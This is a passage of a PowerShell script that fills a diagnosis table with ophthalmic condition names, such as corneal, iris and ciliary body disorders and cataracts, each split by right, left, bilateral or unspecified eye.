$DiagnosisList.Rows.Add("Peripheral corneal degeneration","Peripheral corneal degeneration, right eye") + $null = $DiagnosisList.Rows.Add("Peripheral corneal degeneration","Peripheral corneal degeneration, left eye") + $null = $DiagnosisList.Rows.Add("Peripheral corneal degeneration","Peripheral corneal degeneration, bilateral") + $null = $DiagnosisList.Rows.Add("Peripheral corneal degeneration","Peripheral corneal degeneration, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other corneal degeneration","Other corneal degeneration") + $null = $DiagnosisList.Rows.Add("Hereditary corneal dystrophies","Unspecified hereditary corneal dystrophies") + $null = $DiagnosisList.Rows.Add("Hereditary corneal dystrophies","Endothelial corneal dystrophy") + $null = $DiagnosisList.Rows.Add("Hereditary corneal dystrophies","Epithelial (juvenile) corneal dystrophy") + $null = $DiagnosisList.Rows.Add("Hereditary corneal dystrophies","Granular corneal dystrophy") + $null = $DiagnosisList.Rows.Add("Hereditary corneal dystrophies","Lattice corneal dystrophy") + $null = $DiagnosisList.Rows.Add("Hereditary corneal dystrophies","Macular corneal dystrophy") + $null = $DiagnosisList.Rows.Add("Hereditary corneal dystrophies","Other hereditary corneal dystrophies") + $null = $DiagnosisList.Rows.Add("Keratoconus, unspecified","Keratoconus, unspecified, right eye") + $null = $DiagnosisList.Rows.Add("Keratoconus, unspecified","Keratoconus, unspecified, left eye") + $null = $DiagnosisList.Rows.Add("Keratoconus, unspecified","Keratoconus, unspecified, bilateral") + $null = $DiagnosisList.Rows.Add("Keratoconus, unspecified","Keratoconus, unspecified, unspecified eye") + $null = $DiagnosisList.Rows.Add("Keratoconus, stable","Keratoconus, stable, right eye") + $null = $DiagnosisList.Rows.Add("Keratoconus, stable","Keratoconus, stable, left eye") + $null = $DiagnosisList.Rows.Add("Keratoconus, stable","Keratoconus, stable, bilateral") + $null = $DiagnosisList.Rows.Add("Keratoconus, stable","Keratoconus, stable, unspecified eye") + $null = $DiagnosisList.Rows.Add("Keratoconus, unstable","Keratoconus, unstable, right eye") + $null = $DiagnosisList.Rows.Add("Keratoconus, unstable","Keratoconus, unstable, left eye") + $null = $DiagnosisList.Rows.Add("Keratoconus, unstable","Keratoconus, unstable, bilateral") + $null = $DiagnosisList.Rows.Add("Keratoconus, unstable","Keratoconus, unstable, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other and unspecified corneal deformities","Unspecified corneal deformity") + $null = $DiagnosisList.Rows.Add("Corneal ectasia","Corneal ectasia, right eye") + $null = $DiagnosisList.Rows.Add("Corneal ectasia","Corneal ectasia, left eye") + $null = $DiagnosisList.Rows.Add("Corneal ectasia","Corneal ectasia, bilateral") + $null = $DiagnosisList.Rows.Add("Corneal ectasia","Corneal ectasia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Corneal staphyloma","Corneal staphyloma, right eye") + $null = $DiagnosisList.Rows.Add("Corneal staphyloma","Corneal staphyloma, left eye") + $null = $DiagnosisList.Rows.Add("Corneal staphyloma","Corneal staphyloma, bilateral") + $null = $DiagnosisList.Rows.Add("Corneal staphyloma","Corneal staphyloma, unspecified eye") + $null = $DiagnosisList.Rows.Add("Descemetocele","Descemetocele, right eye") + $null = $DiagnosisList.Rows.Add("Descemetocele","Descemetocele, left eye") + $null = $DiagnosisList.Rows.Add("Descemetocele","Descemetocele, bilateral") + $null = $DiagnosisList.Rows.Add("Descemetocele","Descemetocele, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other corneal deformities","Other corneal deformities, right eye") + $null = $DiagnosisList.Rows.Add("Other corneal deformities","Other corneal deformities, left eye") + $null = $DiagnosisList.Rows.Add("Other corneal deformities","Other corneal deformities, bilateral") + $null = $DiagnosisList.Rows.Add("Other corneal deformities","Other corneal deformities, unspecified eye") + $null = $DiagnosisList.Rows.Add("Anesthesia and hypoesthesia of cornea","Anesthesia and hypoesthesia of cornea, right eye") + $null = $DiagnosisList.Rows.Add("Anesthesia and hypoesthesia of cornea","Anesthesia and hypoesthesia of cornea, left eye") + $null = $DiagnosisList.Rows.Add("Anesthesia and hypoesthesia of cornea","Anesthesia and hypoesthesia of cornea, bilateral") + $null = $DiagnosisList.Rows.Add("Anesthesia and hypoesthesia of cornea","Anesthesia and hypoesthesia of cornea, unspecified eye") + $null = $DiagnosisList.Rows.Add("Corneal disorder due to contact lens","Corneal disorder due to contact lens, right eye") + $null = $DiagnosisList.Rows.Add("Corneal disorder due to contact lens","Corneal disorder due to contact lens, left eye") + $null = $DiagnosisList.Rows.Add("Corneal disorder due to contact lens","Corneal disorder due to contact lens, bilateral") + $null = $DiagnosisList.Rows.Add("Corneal disorder due to contact lens","Corneal disorder due to contact lens, unspecified eye") + $null = $DiagnosisList.Rows.Add("Recurrent erosion of cornea","Recurrent erosion of cornea, right eye") + $null = $DiagnosisList.Rows.Add("Recurrent erosion of cornea","Recurrent erosion of cornea, left eye") + $null = $DiagnosisList.Rows.Add("Recurrent erosion of cornea","Recurrent erosion of cornea, bilateral") + $null = $DiagnosisList.Rows.Add("Recurrent erosion of cornea","Recurrent erosion of cornea, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified disorders of cornea","Other specified disorders of cornea, right eye") + $null = $DiagnosisList.Rows.Add("Other specified disorders of cornea","Other specified disorders of cornea, left eye") + $null = $DiagnosisList.Rows.Add("Other specified disorders of cornea","Other specified disorders of cornea, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified disorders of cornea","Other specified disorders of cornea, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of cornea","Unspecified disorder of cornea") + $null = $DiagnosisList.Rows.Add("Acute and subacute iridocyclitis","Unspecified acute and subacute iridocyclitis") + $null = $DiagnosisList.Rows.Add("Primary iridocyclitis","Primary iridocyclitis, right eye") + $null = $DiagnosisList.Rows.Add("Primary iridocyclitis","Primary iridocyclitis, left eye") + $null = $DiagnosisList.Rows.Add("Primary iridocyclitis","Primary iridocyclitis, bilateral") + $null = $DiagnosisList.Rows.Add("Primary iridocyclitis","Primary iridocyclitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Recurrent acute iridocyclitis","Recurrent acute iridocyclitis, right eye") + $null = $DiagnosisList.Rows.Add("Recurrent acute iridocyclitis","Recurrent acute iridocyclitis, left eye") + $null = $DiagnosisList.Rows.Add("Recurrent acute iridocyclitis","Recurrent acute iridocyclitis, bilateral") + $null = $DiagnosisList.Rows.Add("Recurrent acute iridocyclitis","Recurrent acute iridocyclitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Secondary infectious iridocyclitis","Secondary infectious iridocyclitis, right eye") + $null = $DiagnosisList.Rows.Add("Secondary infectious iridocyclitis","Secondary infectious iridocyclitis, left eye") + $null = $DiagnosisList.Rows.Add("Secondary infectious iridocyclitis","Secondary infectious iridocyclitis, bilateral") + $null = $DiagnosisList.Rows.Add("Secondary infectious iridocyclitis","Secondary infectious iridocyclitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Secondary noninfectious iridocyclitis","Secondary noninfectious iridocyclitis, right eye") + $null = $DiagnosisList.Rows.Add("Secondary noninfectious iridocyclitis","Secondary noninfectious iridocyclitis, left eye") + $null = $DiagnosisList.Rows.Add("Secondary noninfectious iridocyclitis","Secondary noninfectious iridocyclitis, bilateral") + $null = $DiagnosisList.Rows.Add("Secondary noninfectious iridocyclitis","Secondary noninfectious iridocyclitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Hypopyon","Hypopyon, right eye") + $null = $DiagnosisList.Rows.Add("Hypopyon","Hypopyon, left eye") + $null = $DiagnosisList.Rows.Add("Hypopyon","Hypopyon, bilateral") + $null = $DiagnosisList.Rows.Add("Hypopyon","Hypopyon, unspecified eye") + $null = $DiagnosisList.Rows.Add("Chronic iridocyclitis","Chronic iridocyclitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Chronic iridocyclitis","Chronic iridocyclitis, right eye") + $null = $DiagnosisList.Rows.Add("Chronic iridocyclitis","Chronic iridocyclitis, left eye") + $null = $DiagnosisList.Rows.Add("Chronic iridocyclitis","Chronic iridocyclitis, bilateral") + $null = $DiagnosisList.Rows.Add("Lens-induced iridocyclitis","Lens-induced iridocyclitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Lens-induced iridocyclitis","Lens-induced iridocyclitis, right eye") + $null = $DiagnosisList.Rows.Add("Lens-induced iridocyclitis","Lens-induced iridocyclitis, left eye") + $null = $DiagnosisList.Rows.Add("Lens-induced iridocyclitis","Lens-induced iridocyclitis, bilateral") + $null = $DiagnosisList.Rows.Add("Fuchs' heterochromic cyclitis","Fuchs' heterochromic cyclitis, right eye") + $null = $DiagnosisList.Rows.Add("Fuchs' heterochromic cyclitis","Fuchs' heterochromic cyclitis, left eye") + $null = $DiagnosisList.Rows.Add("Fuchs' heterochromic cyclitis","Fuchs' heterochromic cyclitis, bilateral") + $null = $DiagnosisList.Rows.Add("Fuchs' heterochromic cyclitis","Fuchs' heterochromic cyclitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Vogt-Koyanagi syndrome","Vogt-Koyanagi syndrome, right eye") + $null = $DiagnosisList.Rows.Add("Vogt-Koyanagi syndrome","Vogt-Koyanagi syndrome, left eye") + $null = $DiagnosisList.Rows.Add("Vogt-Koyanagi syndrome","Vogt-Koyanagi syndrome, bilateral") + $null = $DiagnosisList.Rows.Add("Vogt-Koyanagi syndrome","Vogt-Koyanagi syndrome, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified iridocyclitis","Unspecified iridocyclitis") + $null = $DiagnosisList.Rows.Add("Hyphema","Hyphema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Hyphema","Hyphema, right eye") + $null = $DiagnosisList.Rows.Add("Hyphema","Hyphema, left eye") + $null = $DiagnosisList.Rows.Add("Hyphema","Hyphema, bilateral") + $null = $DiagnosisList.Rows.Add("Other vascular disorders of iris and ciliary body","Other vascular disorders of iris and ciliary body, right eye") + $null = $DiagnosisList.Rows.Add("Other vascular disorders of iris and ciliary body","Other vascular disorders of iris and ciliary body, left eye") + $null = $DiagnosisList.Rows.Add("Other vascular disorders of iris and ciliary body","Other vascular disorders of iris and ciliary body, bilateral") + $null = $DiagnosisList.Rows.Add("Other vascular disorders of iris and ciliary body","Other vascular disorders of iris and ciliary body, unspecified eye") + $null = $DiagnosisList.Rows.Add("Degeneration of chamber angle","Degeneration of chamber angle, right eye") + $null = $DiagnosisList.Rows.Add("Degeneration of chamber angle","Degeneration of chamber angle, left eye") + $null = $DiagnosisList.Rows.Add("Degeneration of chamber angle","Degeneration of chamber angle, bilateral") + $null = $DiagnosisList.Rows.Add("Degeneration of chamber angle","Degeneration of chamber angle, unspecified eye") + $null = $DiagnosisList.Rows.Add("Degeneration of ciliary body","Degeneration of ciliary body, right eye") + $null = $DiagnosisList.Rows.Add("Degeneration of ciliary body","Degeneration of ciliary body, left eye") + $null = $DiagnosisList.Rows.Add("Degeneration of ciliary body","Degeneration of ciliary body, bilateral") + $null = $DiagnosisList.Rows.Add("Degeneration of ciliary body","Degeneration of ciliary body, unspecified eye") + $null = $DiagnosisList.Rows.Add("Degeneration of iris (pigmentary)","Degeneration of iris (pigmentary), right eye") + $null = $DiagnosisList.Rows.Add("Degeneration of iris (pigmentary)","Degeneration of iris (pigmentary), left eye") + $null = $DiagnosisList.Rows.Add("Degeneration of iris (pigmentary)","Degeneration of iris (pigmentary), bilateral") + $null = $DiagnosisList.Rows.Add("Degeneration of iris (pigmentary)","Degeneration of iris (pigmentary), unspecified eye") + $null = $DiagnosisList.Rows.Add("Degeneration of pupillary margin","Degeneration of pupillary margin, right eye") + $null = $DiagnosisList.Rows.Add("Degeneration of pupillary margin","Degeneration of pupillary margin, left eye") + $null = $DiagnosisList.Rows.Add("Degeneration of pupillary margin","Degeneration of pupillary margin, bilateral") + $null = $DiagnosisList.Rows.Add("Degeneration of pupillary margin","Degeneration of pupillary margin, unspecified eye") + $null = $DiagnosisList.Rows.Add("Iridoschisis","Iridoschisis, right eye") + $null = $DiagnosisList.Rows.Add("Iridoschisis","Iridoschisis, left eye") + $null = $DiagnosisList.Rows.Add("Iridoschisis","Iridoschisis, bilateral") + $null = $DiagnosisList.Rows.Add("Iridoschisis","Iridoschisis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Iris atrophy (essential) (progressive)","Iris atrophy (essential) (progressive), right eye") + $null = $DiagnosisList.Rows.Add("Iris atrophy (essential) (progressive)","Iris atrophy (essential) (progressive), left eye") + $null = $DiagnosisList.Rows.Add("Iris atrophy (essential) (progressive)","Iris atrophy (essential) (progressive), bilateral") + $null = $DiagnosisList.Rows.Add("Iris atrophy (essential) (progressive)","Iris atrophy (essential) (progressive), unspecified eye") + $null = $DiagnosisList.Rows.Add("Miotic pupillary cyst","Miotic pupillary cyst, right eye") + $null = $DiagnosisList.Rows.Add("Miotic pupillary cyst","Miotic pupillary cyst, left eye") + $null = $DiagnosisList.Rows.Add("Miotic pupillary cyst","Miotic pupillary cyst, bilateral") + $null = $DiagnosisList.Rows.Add("Miotic pupillary cyst","Miotic pupillary cyst, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other iris atrophy","Other iris atrophy") + $null = $DiagnosisList.Rows.Add("Idiopathic cysts of iris, ciliary body or anterior chamber","Idiopathic cysts of iris, ciliary body or anterior chamber, right eye") + $null = $DiagnosisList.Rows.Add("Idiopathic cysts of iris, ciliary body or anterior chamber","Idiopathic cysts of iris, ciliary body or anterior chamber, left eye") + $null = $DiagnosisList.Rows.Add("Idiopathic cysts of iris, ciliary body or anterior chamber","Idiopathic cysts of iris, ciliary body or anterior chamber, bilateral") + $null = $DiagnosisList.Rows.Add("Idiopathic cysts of iris, ciliary body or anterior chamber","Idiopathic cysts of iris, ciliary body or anterior chamber, unspecified eye") + $null = $DiagnosisList.Rows.Add("Exudative cysts of iris or anterior chamber","Exudative cysts of iris or anterior chamber, right eye") + $null = $DiagnosisList.Rows.Add("Exudative cysts of iris or anterior chamber","Exudative cysts of iris or anterior chamber, left eye") + $null = $DiagnosisList.Rows.Add("Exudative cysts of iris or anterior chamber","Exudative cysts of iris or anterior chamber, bilateral") + $null = $DiagnosisList.Rows.Add("Exudative cysts of iris or anterior chamber","Exudative cysts of iris or anterior chamber, unspecified eye") + $null = $DiagnosisList.Rows.Add("Implantation cysts of iris, ciliary body or anterior chamber","Implantation cysts of iris, ciliary body or anterior chamber, right eye") + $null = $DiagnosisList.Rows.Add("Implantation cysts of iris, ciliary body or anterior chamber","Implantation cysts of iris, ciliary body or anterior chamber, left eye") + $null = $DiagnosisList.Rows.Add("Implantation cysts of iris, ciliary body or anterior chamber","Implantation cysts of iris, ciliary body or anterior chamber, bilateral") + $null = $DiagnosisList.Rows.Add("Implantation cysts of iris, ciliary body or anterior chamber","Implantation cysts of iris, ciliary body or anterior chamber, unspecified eye") + $null = $DiagnosisList.Rows.Add("Parasitic cyst of iris, ciliary body or anterior chamber","Parasitic cyst of iris, ciliary body or anterior chamber, right eye") + $null = $DiagnosisList.Rows.Add("Parasitic cyst of iris, ciliary body or anterior chamber","Parasitic cyst of iris, ciliary body or anterior chamber, left eye") + $null = $DiagnosisList.Rows.Add("Parasitic cyst of iris, ciliary body or anterior chamber","Parasitic cyst of iris, ciliary body or anterior chamber, bilateral") + $null = $DiagnosisList.Rows.Add("Parasitic cyst of iris, ciliary body or anterior chamber","Parasitic cyst of iris, ciliary body or anterior chamber, unspecified eye") + $null = $DiagnosisList.Rows.Add("Primary cyst of pars plana","Primary cyst of pars plana, right eye") + $null = $DiagnosisList.Rows.Add("Primary cyst of pars plana","Primary cyst of pars plana, left eye") + $null = $DiagnosisList.Rows.Add("Primary cyst of pars plana","Primary cyst of pars plana, bilateral") + $null = $DiagnosisList.Rows.Add("Primary cyst of pars plana","Primary cyst of pars plana, unspecified eye") + $null = $DiagnosisList.Rows.Add("Exudative cyst of pars plana","Exudative cyst of pars plana, right eye") + $null = $DiagnosisList.Rows.Add("Exudative cyst of pars plana","Exudative cyst of pars plana, left eye") + $null = $DiagnosisList.Rows.Add("Exudative cyst of pars plana","Exudative cyst of pars plana, bilateral") + $null = $DiagnosisList.Rows.Add("Exudative cyst of pars plana","Exudative cyst of pars plana, unspecified eye") + $null = $DiagnosisList.Rows.Add("Pupillary membranes","Pupillary membranes, unspecified eye") + $null = $DiagnosisList.Rows.Add("Pupillary membranes","Pupillary membranes, right eye") + $null = $DiagnosisList.Rows.Add("Pupillary membranes","Pupillary membranes, left eye") + $null = $DiagnosisList.Rows.Add("Pupillary membranes","Pupillary membranes, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified adhesions of iris","Unspecified adhesions of iris, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified adhesions of iris","Unspecified adhesions of iris, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified adhesions of iris","Unspecified adhesions of iris, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified adhesions of iris","Unspecified adhesions of iris and ciliary body, unspecified eye") + $null = $DiagnosisList.Rows.Add("Anterior synechiae (iris)","Anterior synechiae (iris), right eye") + $null = $DiagnosisList.Rows.Add("Anterior synechiae (iris)","Anterior synechiae (iris), left eye") + $null = $DiagnosisList.Rows.Add("Anterior synechiae (iris)","Anterior synechiae (iris), bilateral") + $null = $DiagnosisList.Rows.Add("Anterior synechiae (iris)","Anterior synechiae (iris), unspecified eye") + $null = $DiagnosisList.Rows.Add("Goniosynechiae","Goniosynechiae, right eye") + $null = $DiagnosisList.Rows.Add("Goniosynechiae","Goniosynechiae, left eye") + $null = $DiagnosisList.Rows.Add("Goniosynechiae","Goniosynechiae, bilateral") + $null = $DiagnosisList.Rows.Add("Goniosynechiae","Goniosynechiae, unspecified eye") + $null = $DiagnosisList.Rows.Add("Iridodialysis","Iridodialysis, right eye") + $null = $DiagnosisList.Rows.Add("Iridodialysis","Iridodialysis, left eye") + $null = $DiagnosisList.Rows.Add("Iridodialysis","Iridodialysis, bilateral") + $null = $DiagnosisList.Rows.Add("Iridodialysis","Iridodialysis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Posterior synechiae (iris)","Posterior synechiae (iris), right eye") + $null = $DiagnosisList.Rows.Add("Posterior synechiae (iris)","Posterior synechiae (iris), left eye") + $null = $DiagnosisList.Rows.Add("Posterior synechiae (iris)","Posterior synechiae (iris), bilateral") + $null = $DiagnosisList.Rows.Add("Posterior synechiae (iris)","Posterior synechiae (iris), unspecified eye") + $null = $DiagnosisList.Rows.Add("Recession of chamber angle","Recession of chamber angle, right eye") + $null = $DiagnosisList.Rows.Add("Recession of chamber angle","Recession of chamber angle, left eye") + $null = $DiagnosisList.Rows.Add("Recession of chamber angle","Recession of chamber angle, bilateral") + $null = $DiagnosisList.Rows.Add("Recession of chamber angle","Recession of chamber angle, unspecified eye") + $null = $DiagnosisList.Rows.Add("Pupillary abnormalities","Pupillary abnormality, right eye") + $null = $DiagnosisList.Rows.Add("Pupillary abnormalities","Pupillary abnormality, left eye") + $null = $DiagnosisList.Rows.Add("Pupillary abnormalities","Pupillary abnormality, bilateral") + $null = $DiagnosisList.Rows.Add("Pupillary abnormalities","Pupillary abnormality, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified disorders of iris and ciliary body","Floppy iris syndrome") + $null = $DiagnosisList.Rows.Add("Other specified disorders of iris and ciliary body","Plateau iris syndrome (post-iridectomy) (postprocedural)") + $null = $DiagnosisList.Rows.Add("Other specified disorders of iris and ciliary body","Other specified disorders of iris and ciliary body") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of iris and ciliary body","Unspecified disorder of iris and ciliary body") + $null = $DiagnosisList.Rows.Add("Disorders of iris and ciliary body in diseases classified elsewhere","Disorders of iris and ciliary body in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Cortical age-related cataract","Cortical age-related cataract, right eye") + $null = $DiagnosisList.Rows.Add("Cortical age-related cataract","Cortical age-related cataract, left eye") + $null = $DiagnosisList.Rows.Add("Cortical age-related cataract","Cortical age-related cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Cortical age-related cataract","Cortical age-related cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Anterior subcapsular polar age-related cataract","Anterior subcapsular polar age-related cataract, right eye") + $null = $DiagnosisList.Rows.Add("Anterior subcapsular polar age-related cataract","Anterior subcapsular polar age-related cataract, left eye") + $null = $DiagnosisList.Rows.Add("Anterior subcapsular polar age-related cataract","Anterior subcapsular polar age-related cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Anterior subcapsular polar age-related cataract","Anterior subcapsular polar age-related cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Posterior subcapsular polar age-related cataract","Posterior subcapsular polar age-related cataract, right eye") + $null = $DiagnosisList.Rows.Add("Posterior subcapsular polar age-related cataract","Posterior subcapsular polar age-related cataract, left eye") + $null = $DiagnosisList.Rows.Add("Posterior subcapsular polar age-related cataract","Posterior subcapsular polar age-related cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Posterior subcapsular polar age-related cataract","Posterior subcapsular polar age-related cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other age-related incipient cataract","Other age-related incipient cataract, right eye") + $null = $DiagnosisList.Rows.Add("Other age-related incipient cataract","Other age-related incipient cataract, left eye") + $null = $DiagnosisList.Rows.Add("Other age-related incipient cataract","Other age-related incipient cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Other age-related incipient cataract","Other age-related incipient cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Age-related nuclear cataract","Age-related nuclear cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Age-related nuclear cataract","Age-related nuclear cataract, right eye") + $null = $DiagnosisList.Rows.Add("Age-related nuclear cataract","Age-related nuclear cataract, left eye") + $null = $DiagnosisList.Rows.Add("Age-related nuclear cataract","Age-related nuclear cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Age-related cataract, morgagnian type","Age-related cataract, morgagnian type, unspecified eye") + $null = $DiagnosisList.Rows.Add("Age-related cataract, morgagnian type","Age-related cataract, morgagnian type, right eye") + $null = $DiagnosisList.Rows.Add("Age-related cataract, morgagnian type","Age-related cataract, morgagnian type, left eye") + $null = $DiagnosisList.Rows.Add("Age-related cataract, morgagnian type","Age-related cataract, morgagnian type, bilateral") + $null = $DiagnosisList.Rows.Add("Combined forms of age-related cataract","Combined forms of age-related cataract, right eye") + $null = $DiagnosisList.Rows.Add("Combined forms of age-related cataract","Combined forms of age-related cataract, left eye") + $null = $DiagnosisList.Rows.Add("Combined forms of age-related cataract","Combined forms of age-related cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Combined forms of age-related cataract","Combined forms of age-related cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other age-related cataract","Other age-related cataract") + $null = $DiagnosisList.Rows.Add("Unspecified age-related cataract","Unspecified age-related cataract") + $null = $DiagnosisList.Rows.Add("Unspecified infantile and juvenile cataract","Unspecified infantile and juvenile cataract, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified infantile and juvenile cataract","Unspecified infantile and juvenile cataract, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified infantile and juvenile cataract","Unspecified infantile and juvenile cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified infantile and juvenile cataract","Unspecified infantile and juvenile cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Infantile and juvenile cortical, lamellar, or zonular cataract","Infantile and juvenile cortical, lamellar, or zonular cataract, right eye") + $null = $DiagnosisList.Rows.Add("Infantile and juvenile cortical, lamellar, or zonular cataract","Infantile and juvenile cortical, lamellar, or zonular cataract, left eye") + $null = $DiagnosisList.Rows.Add("Infantile and juvenile cortical, lamellar, or zonular cataract","Infantile and juvenile cortical, lamellar, or zonular cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Infantile and juvenile cortical, lamellar, or zonular cataract","Infantile and juvenile cortical, lamellar, or zonular cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Infantile and juvenile nuclear cataract","Infantile and juvenile nuclear cataract, right eye") + $null = $DiagnosisList.Rows.Add("Infantile and juvenile nuclear cataract","Infantile and juvenile nuclear cataract, left eye") + $null = $DiagnosisList.Rows.Add("Infantile and juvenile nuclear cataract","Infantile and juvenile nuclear cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Infantile and juvenile nuclear cataract","Infantile and juvenile nuclear cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Anterior subcapsular polar infantile and juvenile cataract","Anterior subcapsular polar infantile and juvenile cataract, right eye") + $null = $DiagnosisList.Rows.Add("Anterior subcapsular polar infantile and juvenile cataract","Anterior subcapsular polar infantile and juvenile cataract, left eye") + $null = $DiagnosisList.Rows.Add("Anterior subcapsular polar infantile and juvenile cataract","Anterior subcapsular polar infantile and juvenile cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Anterior subcapsular polar infantile and juvenile cataract","Anterior subcapsular polar infantile and juvenile cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Posterior subcapsular polar infantile and juvenile cataract","Posterior subcapsular polar infantile and juvenile cataract, right eye") + $null = $DiagnosisList.Rows.Add("Posterior subcapsular polar infantile and juvenile cataract","Posterior subcapsular polar infantile and juvenile cataract, left eye") + $null = $DiagnosisList.Rows.Add("Posterior subcapsular polar infantile and juvenile cataract","Posterior subcapsular polar infantile and juvenile cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Posterior subcapsular polar infantile and juvenile cataract","Posterior subcapsular polar infantile and juvenile cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Combined forms of infantile and juvenile cataract","Combined forms of infantile and juvenile cataract, right eye") + $null = $DiagnosisList.Rows.Add("Combined forms of infantile and juvenile cataract","Combined forms of infantile and juvenile cataract, left eye") + $null = $DiagnosisList.Rows.Add("Combined forms of infantile and juvenile cataract","Combined forms of infantile and juvenile cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Combined forms of infantile and juvenile cataract","Combined forms of infantile and juvenile cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other infantile and juvenile cataract","Other infantile and juvenile cataract") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic cataract","Unspecified traumatic cataract, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic cataract","Unspecified traumatic cataract, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic cataract","Unspecified traumatic cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified traumatic cataract","Unspecified traumatic cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Localized traumatic opacities","Localized traumatic opacities, right eye") + $null = $DiagnosisList.Rows.Add("Localized traumatic opacities","Localized traumatic opacities, left eye") + $null = $DiagnosisList.Rows.Add("Localized traumatic opacities","Localized traumatic opacities, bilateral") + $null = $DiagnosisList.Rows.Add("Localized traumatic opacities","Localized traumatic opacities, unspecified eye") + $null = $DiagnosisList.Rows.Add("Partially resolved traumatic cataract","Partially resolved traumatic cataract, right eye") + $null = $DiagnosisList.Rows.Add("Partially resolved traumatic cataract","Partially resolved traumatic cataract, left eye") + $null = $DiagnosisList.Rows.Add("Partially resolved traumatic cataract","Partially resolved traumatic cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Partially resolved traumatic cataract","Partially resolved traumatic cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Total traumatic cataract","Total traumatic cataract, right eye") + $null = $DiagnosisList.Rows.Add("Total traumatic cataract","Total traumatic cataract, left eye") + $null = $DiagnosisList.Rows.Add("Total traumatic cataract","Total traumatic cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Total traumatic cataract","Total traumatic cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Complicated cataract","Unspecified complicated cataract") + $null = $DiagnosisList.Rows.Add("Cataract with neovascularization","Cataract with neovascularization, right eye") + $null = $DiagnosisList.Rows.Add("Cataract with neovascularization","Cataract with neovascularization, left eye") + $null = $DiagnosisList.Rows.Add("Cataract with neovascularization","Cataract with neovascularization, bilateral") + $null = $DiagnosisList.Rows.Add("Cataract with neovascularization","Cataract with neovascularization, unspecified eye") + $null = $DiagnosisList.Rows.Add("Cataract secondary to ocular disorders (degenerative) (inflammatory)","Cataract secondary to ocular disorders (degenerative) (inflammatory), right eye") + $null = $DiagnosisList.Rows.Add("Cataract secondary to ocular disorders (degenerative) (inflammatory)","Cataract secondary to ocular disorders (degenerative) (inflammatory), left eye") + $null = $DiagnosisList.Rows.Add("Cataract secondary to ocular disorders (degenerative) (inflammatory)","Cataract secondary to ocular disorders (degenerative) (inflammatory), bilateral") + $null = $DiagnosisList.Rows.Add("Cataract secondary to ocular disorders (degenerative) (inflammatory)","Cataract secondary to ocular disorders (degenerative) (inflammatory), unspecified eye") + $null = $DiagnosisList.Rows.Add("Glaucomatous flecks (subcapsular)","Glaucomatous flecks (subcapsular), right eye") + $null = $DiagnosisList.Rows.Add("Glaucomatous flecks (subcapsular)","Glaucomatous flecks (subcapsular), left eye") + $null = $DiagnosisList.Rows.Add("Glaucomatous flecks (subcapsular)","Glaucomatous flecks (subcapsular), bilateral") + $null = $DiagnosisList.Rows.Add("Glaucomatous flecks (subcapsular)","Glaucomatous flecks (subcapsular), unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug-induced cataract","Drug-induced cataract, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drug-induced cataract","Drug-induced cataract, right eye") + $null = $DiagnosisList.Rows.Add("Drug-induced cataract","Drug-induced cataract, left eye") + $null = $DiagnosisList.Rows.Add("Drug-induced cataract","Drug-induced cataract, bilateral") + $null = $DiagnosisList.Rows.Add("Secondary cataract","Unspecified secondary cataract") + $null = $DiagnosisList.Rows.Add("Soemmering's ring","Soemmering's ring, right eye") + $null = 